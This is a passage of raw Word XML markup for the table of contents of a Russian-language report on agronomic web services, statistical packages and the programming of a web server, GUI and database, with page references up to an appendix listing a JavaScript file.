        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709234 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F08E0BF" w14:textId="1CE5AD44" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709235" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.1 Агрономические веб-сервисы для работы с агроэкосистемой</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709235 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22A2EA29" w14:textId="4DECF1D1" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709236" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2 Описание популярных статистических пакетов</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709236 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EFDFA83" w14:textId="00B28E0C" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709237" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3 Выбор технологий для решения задачи</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709237 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="508068B4" w14:textId="45D707CC" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709238" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1 Технология программирования веб-сервера и графического пользовательского интерфейса</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709238 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="693D978E" w14:textId="0C13FA04" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709239" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4 Программирование веб-сервера, графического пользовательского интерфейса и базы данных</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709239 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AEC1E70" w14:textId="081C860D" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709240" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.1 Аппаратное обеспечение проекта</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709240 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F58B88E" w14:textId="3A486D82" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709241" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.2 Программное обеспечение проекта</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709241 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19AD01D2" w14:textId="6F8191C7" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709242" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5 Поддержка программы</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709242 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D2B8DCA" w14:textId="6D3398FF" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709243" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1 Тестирование программы</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709243 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AEB3036" w14:textId="4C1F5816" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709244" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.2 Разработка документации</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709244 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>82</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BA55971" w14:textId="33247187" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709245" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6 Опытная и промышленная эксплуатация</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709245 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31650504" w14:textId="1F8DC452" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709246" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ЗАКЛЮЧЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709246 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>86</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B7E3071" w14:textId="4DDDE8AF" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709247" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709247 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03150531" w14:textId="640B818D" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709248" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">ПРИЛОЖЕНИЕ А (листинг файла </w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>indexcharts</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>js</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709248 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
